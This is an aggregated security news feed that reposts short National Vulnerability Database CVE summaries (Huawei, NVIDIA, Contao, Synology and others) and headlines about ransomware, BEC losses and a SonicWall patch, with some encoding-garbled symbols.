βΌ CVE-2021-22377 βΌ
π Read
via "National Vulnerability Database".
There is a command injection vulnerability in S12700 V200R019C00SPC500, S2700 V200R019C00SPC500, S5700 V200R019C00SPC500, S6700 V200R019C00SPC500 and S7700 V200R019C00SPC500. A module does not verify specific input sufficiently. Attackers can exploit this vulnerability by sending malicious parameters to inject command. This can compromise normal service.π Read
via "National Vulnerability Database".
βΌ CVE-2021-22382 βΌ
π Read
via "National Vulnerability Database".
Huawei LTE USB Dongle products have an improper permission assignment vulnerability. An attacker can locally access and log in to a PC to induce a user to install a specially crafted application. After successfully exploiting this vulnerability, the attacker can perform unauthenticated operations. Affected product versions include:E3372 E3372h-153TCPU-V200R002B333D01SP00C00.π Read
via "National Vulnerability Database".
βΌ CVE-2021-22361 βΌ
π Read
via "National Vulnerability Database".
There is an improper authorization vulnerability in eCNS280 V100R005C00, V100R005C10 and eSE620X vESS V100R001C10SPC200, V100R001C20SPC200. A file access is not authorized correctly. Attacker with low access may launch privilege escalation in a specific scenario. This may compromise the normal service.π Read
via "National Vulnerability Database".
β BEC Losses Top $1.8B as Tactics Evolve β
π Read
via "Threat Post".
BEC attacks getting are more dangerous, and smart users are the ones who can stop it.π Read
via "Threat Post".
Threat Post
BEC Losses Top $1.8B as Tactics Evolve
BEC attacks getting are more dangerous, and smart users are the ones who can stop it.
βΌ CVE-2021-32699 βΌ
π Read
via "National Vulnerability Database".
Wings is the control plane software for the open source Pterodactyl game management system. All versions of Pterodactyl Wings prior to `1.4.4` are vulnerable to system resource exhaustion due to improper container process limits being defined. A malicious user can consume more resources than intended and cause downstream impacts to other clients on the same hardware, eventually causing the physical server to stop responding. Users should upgrade to `1.4.4` to mitigate the issue. There is no non-code based workaround for impacted versions of the software. Users running customized versions of this software can manually set a PID limit for containers created.π Read
via "National Vulnerability Database".
βΌ CVE-2021-32700 βΌ
π Read
via "National Vulnerability Database".
Ballerina is an open source programming language and platform for cloud application programmers. Ballerina versions 1.2.x and SL releases up to alpha 3 have a potential for a supply chain attack via MiTM against users. Http connections did not make use of TLS and certificate checking was ignored. The vulnerability allows an attacker to substitute or modify packages retrieved from BC thus allowing to inject malicious code into ballerina executables. This has been patched in Ballerina 1.2.14 and Ballerina SwanLake alpha4.π Read
via "National Vulnerability Database".
π¦Ώ Data resiliency is key to surviving a ransomware attack, expert says π¦Ώ
π Read
via "Tech Republic".
It's not "if" but "when" you'll be attacked, cybersecurity expert says. Checking on your data and backups is something businesses should do regularly.π Read
via "Tech Republic".
TechRepublic
Data resiliency is key to surviving a ransomware attack, expert says
It's not "if" but "when" you'll be attacked, cybersecurity expert says. Checking on your data and backups is something businesses should do regularly.
π¦Ώ How to be prepared for a ransomware attack: Check your data and backups π¦Ώ
π Read
via "Tech Republic".
Expert says ransomware attacks will happen, and your company has to be prepared long before the attack hits.π Read
via "Tech Republic".
TechRepublic
How to be prepared for a ransomware attack: Check your data and backups
Expert says ransomware attacks will happen, and your company has to be prepared long before the attack hits.
π΄ Despite Heightened Cyber-Risks, Few Security Leaders Report to CEO π΄
π Read
via "Dark Reading".
A new report suggests that top management at most companies still don't get security.π Read
via "Dark Reading".
βΌ CVE-2021-34391 βΌ
π Read
via "National Vulnerability Database".
Trusty TLK contains a vulnerability in the NVIDIA TLK kernelΓΒ―ΓΒΏΓΒ½s tz_handle_trusted_app_smc function where a lack of integer overflow checks on the req_off and param_ofs variables leads to memory corruption of critical kernel structures.π Read
via "National Vulnerability Database".
βΌ CVE-2021-34396 βΌ
π Read
via "National Vulnerability Database".
Bootloader contains a vulnerability in access permission settings where unauthorized software may be able to overwrite NVIDIA MB2 code, which would result in limited denial of service.π Read
via "National Vulnerability Database".
βΌ CVE-2021-34393 βΌ
π Read
via "National Vulnerability Database".
Trusty contains a vulnerability in TSEC TA which deserializes the incoming messages even though the TSEC TA does not expose any command. This vulnerability might allow an attacker to exploit the deserializer to impact code execution, causing information disclosure.π Read
via "National Vulnerability Database".
βΌ CVE-2021-34395 βΌ
π Read
via "National Vulnerability Database".
Trusty TLK contains a vulnerability in its access permission settings where it does not properly restrict access to a resource from a user with local privileges, which might lead to limited information disclosure and limited denial of service.π Read
via "National Vulnerability Database".
βΌ CVE-2021-34397 βΌ
π Read
via "National Vulnerability Database".
Bootloader contains a vulnerability in NVIDIA MB2, which may cause free-the-wrong-heap, which may lead to limited denial of service.π Read
via "National Vulnerability Database".
βΌ CVE-2021-34392 βΌ
π Read
via "National Vulnerability Database".
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where an integer overflow in the tz_map_shared_mem function can bypass boundary checks, which might lead to denial of service.π Read
via "National Vulnerability Database".
βΌ CVE-2021-34390 βΌ
π Read
via "National Vulnerability Database".
Trusty TLK contains a vulnerability in the NVIDIA TLK kernel function where a lack of checks allows the exploitation of an integer overflow on the size parameter of the tz_map_shared_mem function.π Read
via "National Vulnerability Database".
β SonicWall βBotchesβ October Patch for Critical VPN Bug β
π Read
via "Threat Post".
Company finally rolls out the complete fix this week for an RCE flaw affecting some 800,000 devices that could result in crashes or prevent users from connecting to corporate resources.π Read
via "Threat Post".
Threat Post
SonicWall βBotchesβ October Patch for VPN Bug
Company finally rolls out the complete fix this week for a flaw affecting some 800,000 devices that could result in crashes or prevent users from connecting to corporate resources.
βΌ CVE-2021-35210 βΌ
π Read
via "National Vulnerability Database".
Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end.π Read
via "National Vulnerability Database".
βΌ CVE-2021-29084 βΌ
π Read
via "National Vulnerability Database".
Improper neutralization of special elements in output used by a downstream component ('Injection') vulnerability in Security Advisor report management component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to read arbitrary files via unspecified vectors.π Read
via "National Vulnerability Database".
β Unpatched Linux Marketplace Bugs Allow Wormable Attacks, Drive-By RCE β
π Read
via "Threat Post".
A pair of zero-days affecting Pling-based marketplaces could allow for some ugly attacks on unsuspecting Linux enthusiasts -- with no patches in sight.π Read
via "Threat Post".
Threat Post
Unpatched Linux Marketplace Bugs Allow Wormable Attacks, Drive-By RCE
A pair of zero-days affecting Pling-based marketplaces could allow for some ugly attacks on unsuspecting Linux enthusiasts β with no patches in sight.
π΄ Expecting the Unexpected: Tips for Effectively Mitigating Ransomware Attacks in 2021 π΄
π Read
via "Dark Reading".
Cybercriminals continually innovate to thwart security protocols, but organizations can take steps to prevent and mitigate ransomware attacks.π Read
via "Dark Reading".